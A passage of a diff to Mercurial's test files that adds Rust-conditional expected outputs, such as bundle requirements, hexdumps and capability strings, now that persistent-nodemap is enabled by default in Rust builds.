06 00 00 |HGS1UN..........| 0010: 00 00 00 00 0a 68 00 23 67 65 6e 65 72 61 6c 64 |.....h.#generald| (no-zstd !) - 0010: 00 00 00 00 0a 69 00 23 67 65 6e 65 72 61 6c 64 |.....i.#generald| (zstd !) 
- 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| - 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| + 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| (no-zstd !) + 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| (no-zstd !) + 0010: 00 00 00 00 0a 69 00 23 67 65 6e 65 72 61 6c 64 |.....i.#generald| (zstd no-rust !) + 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| (zstd no-rust !) + 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| (zstd no-rust !) + 0010: 00 00 00 00 0a 69 00 36 67 65 6e 65 72 61 6c 64 |.....i.6generald| (rust !) + 0020: 65 6c 74 61 2c 70 65 72 73 69 73 74 65 6e 74 2d |elta,persistent-| (rust !) + 0030: 6e 6f 64 65 6d 61 70 2c 72 65 76 6c 6f 67 76 31 |nodemap,revlogv1| (rust !) $ hg debugbundle --spec packed.hg - none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog + none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog (no-rust !) + none-packed1;requirements%3Dgeneraldelta%2Cpersistent-nodemap%2Crevlogv1%2Csparserevlog (rust !) generaldelta requirement is not listed in stream clone bundles unless used @@ -320,17 +328,23 @@ $ cd .. $ hg -R testnongd debugcreatestreamclonebundle packednongd.hg writing 301 bytes for 3 files - bundle requirements: revlogv1 + bundle requirements: revlogv1 (no-rust !) + bundle requirements: persistent-nodemap, revlogv1 (rust !) $ f -B 64 --size --sha1 --hexdump packednongd.hg - packednongd.hg: size=383, sha1=1d9c230238edd5d38907100b729ba72b1831fe6f + packednongd.hg: size=383, sha1=1d9c230238edd5d38907100b729ba72b1831fe6f (no-rust !) + packednongd.hg: size=402, sha1=d3cc1417f0e8142cf9340aaaa520b660ad3ec3ea (rust !) 
0000: 48 47 53 31 55 4e 00 00 00 00 00 00 00 03 00 00 |HGS1UN..........| - 0010: 00 00 00 00 01 2d 00 09 72 65 76 6c 6f 67 76 31 |.....-..revlogv1| - 0020: 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 34 0a 00 |.data/foo.i.64..| - 0030: 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| + 0010: 00 00 00 00 01 2d 00 09 72 65 76 6c 6f 67 76 31 |.....-..revlogv1| (no-rust !) + 0020: 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 34 0a 00 |.data/foo.i.64..| (no-rust !) + 0030: 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| (no-rust !) + 0010: 00 00 00 00 01 2d 00 1c 70 65 72 73 69 73 74 65 |.....-..persiste| (rust !) + 0020: 6e 74 2d 6e 6f 64 65 6d 61 70 2c 72 65 76 6c 6f |nt-nodemap,revlo| (rust !) + 0030: 67 76 31 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 |gv1.data/foo.i.6| (rust !) $ hg debugbundle --spec packednongd.hg - none-packed1;requirements%3Drevlogv1 + none-packed1;requirements%3Drevlogv1 (no-rust !) + none-packed1;requirements%3Dpersistent-nodemap%2Crevlogv1 (rust !) Warning emitted when packed bundles contain secret changesets @@ -344,7 +358,8 @@ $ hg -R testsecret debugcreatestreamclonebundle packedsecret.hg (warning: stream clone bundle will contain secret revisions) writing 301 bytes for 3 files - bundle requirements: generaldelta, revlogv1, sparserevlog + bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !) Unpacking packed1 bundles with "hg unbundle" isn't allowed diff --git a/tests/test-clone-uncompressed.t b/tests/test-clone-uncompressed.t --- a/tests/test-clone-uncompressed.t +++ b/tests/test-clone-uncompressed.t @@ -216,13 +216,16 @@ $ f --size --hex --bytes 256 body body: size=112262 (no-zstd !) - body: size=109410 (zstd !) + body: size=109410 (zstd no-rust !) + body: size=109431 (rust !) 
0000: 04 6e 6f 6e 65 48 47 32 30 00 00 00 00 00 00 00 |.noneHG20.......| 0010: 7f 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (no-zstd !) 0020: 05 09 04 0c 44 62 79 74 65 63 6f 75 6e 74 39 38 |....Dbytecount98| (no-zstd !) 0030: 37 37 35 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |775filecount1030| (no-zstd !) - 0010: 99 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (zstd !) - 0020: 05 09 04 0c 5e 62 79 74 65 63 6f 75 6e 74 39 35 |....^bytecount95| (zstd !) + 0010: 99 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (zstd no-rust !) + 0010: ae 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (rust !) + 0020: 05 09 04 0c 5e 62 79 74 65 63 6f 75 6e 74 39 35 |....^bytecount95| (zstd no-rust !) + 0020: 05 09 04 0c 73 62 79 74 65 63 6f 75 6e 74 39 35 |....sbytecount95| (rust !) 0030: 38 39 37 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |897filecount1030| (zstd !) 0040: 72 65 71 75 69 72 65 6d 65 6e 74 73 64 6f 74 65 |requirementsdote| 0050: 6e 63 6f 64 65 25 32 43 66 6e 63 61 63 68 65 25 |ncode%2Cfncache%| @@ -236,15 +239,24 @@ 00d0: d1 ec 39 00 00 00 00 00 00 00 00 00 00 00 00 75 |..9............u| (no-zstd !) 00e0: 30 73 08 42 64 61 74 61 2f 31 2e 69 00 03 00 01 |0s.Bdata/1.i....| (no-zstd !) 00f0: 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 |................| (no-zstd !) - 0070: 43 72 65 76 6c 6f 67 2d 63 6f 6d 70 72 65 73 73 |Crevlog-compress| (zstd !) - 0080: 69 6f 6e 2d 7a 73 74 64 25 32 43 72 65 76 6c 6f |ion-zstd%2Crevlo| (zstd !) - 0090: 67 76 31 25 32 43 73 70 61 72 73 65 72 65 76 6c |gv1%2Csparserevl| (zstd !) - 00a0: 6f 67 25 32 43 73 74 6f 72 65 00 00 80 00 73 08 |og%2Cstore....s.| (zstd !) - 00b0: 42 64 61 74 61 2f 30 2e 69 00 03 00 01 00 00 00 |Bdata/0.i.......| (zstd !) - 00c0: 00 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 |................| (zstd !) - 00d0: 01 ff ff ff ff ff ff ff ff 80 29 63 a0 49 d3 23 |..........)c.I.#| (zstd !) 
- 00e0: 87 bf ce fe 56 67 92 67 2c 69 d1 ec 39 00 00 00 |....Vg.g,i..9...| (zstd !) - 00f0: 00 00 00 00 00 00 00 00 00 75 30 73 08 42 64 61 |.........u0s.Bda| (zstd !) + 0070: 43 72 65 76 6c 6f 67 2d 63 6f 6d 70 72 65 73 73 |Crevlog-compress| (zstd no-rust !) + 0070: 43 70 65 72 73 69 73 74 65 6e 74 2d 6e 6f 64 65 |Cpersistent-node| (rust !) + 0080: 69 6f 6e 2d 7a 73 74 64 25 32 43 72 65 76 6c 6f |ion-zstd%2Crevlo| (zstd no-rust !) + 0080: 6d 61 70 25 32 43 72 65 76 6c 6f 67 2d 63 6f 6d |map%2Crevlog-com| (rust !) + 0090: 67 76 31 25 32 43 73 70 61 72 73 65 72 65 76 6c |gv1%2Csparserevl| (zstd no-rust !) + 0090: 70 72 65 73 73 69 6f 6e 2d 7a 73 74 64 25 32 43 |pression-zstd%2C| (rust !) + 00a0: 6f 67 25 32 43 73 74 6f 72 65 00 00 80 00 73 08 |og%2Cstore....s.| (zstd no-rust !) + 00a0: 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 73 |revlogv1%2Cspars| (rust !) + 00b0: 42 64 61 74 61 2f 30 2e 69 00 03 00 01 00 00 00 |Bdata/0.i.......| (zstd no-rust !) + 00b0: 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 00 |erevlog%2Cstore.| (rust !) + 00c0: 00 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 |................| (zstd no-rust !) + 00c0: 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 03 |...s.Bdata/0.i..| (rust !) + 00d0: 01 ff ff ff ff ff ff ff ff 80 29 63 a0 49 d3 23 |..........)c.I.#| (zstd no-rust !) + 00d0: 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 00 |................| (rust !) + 00e0: 87 bf ce fe 56 67 92 67 2c 69 d1 ec 39 00 00 00 |....Vg.g,i..9...| (zstd no-rust !) + 00e0: 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 29 |...............)| (rust !) + 00f0: 00 00 00 00 00 00 00 00 00 75 30 73 08 42 64 61 |.........u0s.Bda| (zstd no-rust !) + 00f0: 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 d1 |c.I.#....Vg.g,i.| (rust !) 
--uncompressed is an alias to --stream diff --git a/tests/test-clonebundles.t b/tests/test-clonebundles.t --- a/tests/test-clonebundles.t +++ b/tests/test-clonebundles.t @@ -279,7 +279,8 @@ $ hg -R server debugcreatestreamclonebundle packed.hg writing 613 bytes for 4 files - bundle requirements: generaldelta, revlogv1, sparserevlog + bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !) No bundle spec should work diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1628,7 +1628,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no yes no revlog-v2: no yes no plain-cl-delta: yes yes yes @@ -1667,7 +1668,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no yes no revlog-v2: no yes no plain-cl-delta: yes yes yes diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -39,7 +39,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: yes yes no revlog-v2: yes yes no plain-cl-delta: yes yes yes @@ -54,7 +55,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) 
copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -426,7 +428,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: yes yes no revlog-v2: yes yes no plain-cl-delta: yes yes yes @@ -453,7 +456,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: yes yes no plain-cl-delta: yes yes yes @@ -482,7 +486,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: yes yes no revlog-v2: yes yes no plain-cl-delta: yes yes yes diff --git a/tests/test-debugcommands.t b/tests/test-debugcommands.t --- a/tests/test-debugcommands.t +++ b/tests/test-debugcommands.t @@ -186,8 +186,10 @@ node trie capacity: 4 node trie count: 2 node trie depth: 1 - node trie last rev scanned: -1 - node trie lookups: 4 + node trie last rev scanned: -1 (no-rust !) + node trie last rev scanned: 3 (rust !) + node trie lookups: 4 (no-rust !) + node trie lookups: 2 (rust !) node trie misses: 1 node trie splits: 1 revs in memory: 3 @@ -654,8 +656,10 @@ devel-peer-request: pairs: 81 bytes sending hello command sending between command - remote: 444 - remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + remote: 444 (no-rust !) + remote: 463 (rust !) + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !) 
+ remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !) remote: 1 devel-peer-request: protocaps devel-peer-request: caps: * bytes (glob) diff --git a/tests/test-hgweb-commands.t b/tests/test-hgweb-commands.t --- a/tests/test-hgweb-commands.t +++ b/tests/test-hgweb-commands.t @@ -2193,7 +2193,8 @@ lookup pushkey stream-preferred - streamreqs=generaldelta,revlogv1,sparserevlog + streamreqs=generaldelta,revlogv1,sparserevlog (no-rust !) + streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog (rust !) unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash diff --git a/tests/test-init.t b/tests/test-init.t --- a/tests/test-init.t +++ b/tests/test-init.t @@ -21,6 +21,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -60,6 +61,7 @@ $ hg --config format.usestore=false init old $ checknewrepo old generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 testonly-simplestore (reposimplestore !) @@ -72,6 +74,7 @@ store created 00changelog.i created generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -86,6 +89,7 @@ 00changelog.i created fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -100,6 +104,7 @@ 00changelog.i created dotencode fncache + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 store @@ -218,6 +223,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -239,6 +245,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -256,6 +263,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) 
revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-lfconvert.t b/tests/test-lfconvert.t --- a/tests/test-lfconvert.t +++ b/tests/test-lfconvert.t @@ -99,6 +99,7 @@ fncache generaldelta largefiles + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-lfs-largefiles.t b/tests/test-lfs-largefiles.t --- a/tests/test-lfs-largefiles.t +++ b/tests/test-lfs-largefiles.t @@ -293,6 +293,7 @@ fncache generaldelta lfs + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-narrow-clone-no-ellipsis.t b/tests/test-narrow-clone-no-ellipsis.t --- a/tests/test-narrow-clone-no-ellipsis.t +++ b/tests/test-narrow-clone-no-ellipsis.t @@ -26,6 +26,7 @@ dotencode fncache narrowhg-experimental + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-narrow-clone-stream.t b/tests/test-narrow-clone-stream.t --- a/tests/test-narrow-clone-stream.t +++ b/tests/test-narrow-clone-stream.t @@ -68,6 +68,7 @@ fncache (flat-fncache !) generaldelta narrowhg-experimental + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-narrow-clone.t b/tests/test-narrow-clone.t --- a/tests/test-narrow-clone.t +++ b/tests/test-narrow-clone.t @@ -42,6 +42,7 @@ dotencode fncache narrowhg-experimental + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-narrow-sparse.t b/tests/test-narrow-sparse.t --- a/tests/test-narrow-sparse.t +++ b/tests/test-narrow-sparse.t @@ -61,6 +61,7 @@ fncache generaldelta narrowhg-experimental + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) 
revlogv1 sparserevlog diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -2,6 +2,9 @@ Test the persistent on-disk nodemap =================================== + +#if no-rust + $ cat << EOF >> $HGRCPATH > [format] > use-persistent-nodemap=yes @@ -9,6 +12,8 @@ > persistent-nodemap=yes > EOF +#endif + $ hg init test-repo --config storage.revlog.persistent-nodemap.slow-path=allow $ cd test-repo diff --git a/tests/test-phases.t b/tests/test-phases.t --- a/tests/test-phases.t +++ b/tests/test-phases.t @@ -886,6 +886,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -914,6 +915,7 @@ fncache generaldelta internal-phase + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-remotefilelog-clone-tree.t b/tests/test-remotefilelog-clone-tree.t --- a/tests/test-remotefilelog-clone-tree.t +++ b/tests/test-remotefilelog-clone-tree.t @@ -30,6 +30,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -72,6 +73,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -114,6 +116,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-remotefilelog-clone.t b/tests/test-remotefilelog-clone.t --- a/tests/test-remotefilelog-clone.t +++ b/tests/test-remotefilelog-clone.t @@ -27,6 +27,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -62,6 +63,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) 
revlogv1 sparserevlog @@ -112,6 +114,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-remotefilelog-log.t b/tests/test-remotefilelog-log.t --- a/tests/test-remotefilelog-log.t +++ b/tests/test-remotefilelog-log.t @@ -30,6 +30,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-repo-compengines.t b/tests/test-repo-compengines.t --- a/tests/test-repo-compengines.t +++ b/tests/test-repo-compengines.t @@ -13,6 +13,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -61,6 +62,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -79,6 +81,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd revlogv1 sparserevlog @@ -182,6 +185,7 @@ exp-compression-none fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store diff --git a/tests/test-requires.t b/tests/test-requires.t --- a/tests/test-requires.t +++ b/tests/test-requires.t @@ -53,6 +53,7 @@ featuresetup-test fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-revlog-v2.t b/tests/test-revlog-v2.t --- a/tests/test-revlog-v2.t +++ b/tests/test-revlog-v2.t @@ -24,6 +24,7 @@ dotencode exp-revlogv2.2 fncache + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) sparserevlog store diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -176,6 +176,7 @@ dotencode fncache generaldelta + persistent-nodemap revlog-compression-zstd (zstd !) 
revlogv1 sparserevlog @@ -202,7 +203,7 @@ Persistent nodemap $ cd $TESTTMP $ rm -rf repository - $ hg init repository + $ hg --config format.use-persistent-nodemap=no init repository $ cd repository $ $NO_FALLBACK rhg debugrequirements | grep nodemap [1] diff --git a/tests/test-sidedata.t b/tests/test-sidedata.t --- a/tests/test-sidedata.t +++ b/tests/test-sidedata.t @@ -56,7 +56,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -70,7 +71,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: no yes no plain-cl-delta: yes yes yes @@ -90,7 +92,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: yes no no plain-cl-delta: yes yes yes @@ -104,7 +107,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: yes no no plain-cl-delta: yes yes yes diff --git a/tests/test-sparse-requirement.t b/tests/test-sparse-requirement.t --- a/tests/test-sparse-requirement.t +++ b/tests/test-sparse-requirement.t @@ -20,6 +20,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -39,6 +40,7 @@ exp-sparse fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -59,6 +61,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) 
revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-sqlitestore.t b/tests/test-sqlitestore.t --- a/tests/test-sqlitestore.t +++ b/tests/test-sqlitestore.t @@ -17,6 +17,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -32,6 +33,7 @@ exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$ (no-zstd !) fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -51,6 +53,7 @@ exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$ fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -65,6 +68,7 @@ exp-sqlite-comp-001=none fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-ssh-bundle1.t b/tests/test-ssh-bundle1.t --- a/tests/test-ssh-bundle1.t +++ b/tests/test-ssh-bundle1.t @@ -486,9 +486,11 @@ sending upgrade request: * proto=exp-ssh-v2-0003 (glob) (sshv2 !) sending hello command sending between command - remote: 444 (sshv1 !) + remote: 444 (sshv1 no-rust !) + remote: 463 (sshv1 rust !) protocol upgraded to exp-ssh-v2-0003 (sshv2 !) - remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !) + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !) remote: 1 (sshv1 !) 
sending protocaps command preparing listkeys for "bookmarks" diff --git a/tests/test-ssh.t b/tests/test-ssh.t --- a/tests/test-ssh.t +++ b/tests/test-ssh.t @@ -542,9 +542,11 @@ devel-peer-request: pairs: 81 bytes sending hello command sending between command - remote: 444 (sshv1 !) + remote: 444 (sshv1 no-rust !) + remote: 463 (sshv1 rust !) protocol upgraded to exp-ssh-v2-0003 (sshv2 !) - remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !) + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !) remote: 1 (sshv1 !) devel-peer-request: protocaps devel-peer-request: caps: * bytes (glob) diff --git a/tests/test-stream-bundle-v2.t b/tests/test-stream-bundle-v2.t --- a/tests/test-stream-bundle-v2.t +++ b/tests/test-stream-bundle-v2.t @@ -47,10 +47,12 @@ $ hg debugbundle bundle.hg Stream params: {} stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (no-zstd !) - stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (zstd !) + stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (zstd no-rust !) 
+ stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Cpersistent-nodemap%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (rust !) $ hg debugbundle --spec bundle.hg none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore (no-zstd !) - none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (zstd !) + none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (zstd no-rust !) + none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Cpersistent-nodemap%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (rust !) Test that we can apply the bundle as a stream clone bundle diff --git a/tests/test-treemanifest.t b/tests/test-treemanifest.t --- a/tests/test-treemanifest.t +++ b/tests/test-treemanifest.t @@ -834,9 +834,11 @@ $ hg -R deeprepo debugcreatestreamclonebundle repo-packed.hg writing 5330 bytes for 18 files (no-zstd !) writing 5400 bytes for 18 files (zstd !) - bundle requirements: generaldelta, revlogv1, sparserevlog, treemanifest + bundle requirements: generaldelta, revlogv1, sparserevlog, treemanifest (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog, treemanifest (rust !) $ hg debugbundle --spec repo-packed.hg - none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog%2Ctreemanifest + none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog%2Ctreemanifest (no-rust !) + none-packed1;requirements%3Dgeneraldelta%2Cpersistent-nodemap%2Crevlogv1%2Csparserevlog%2Ctreemanifest (rust !) 
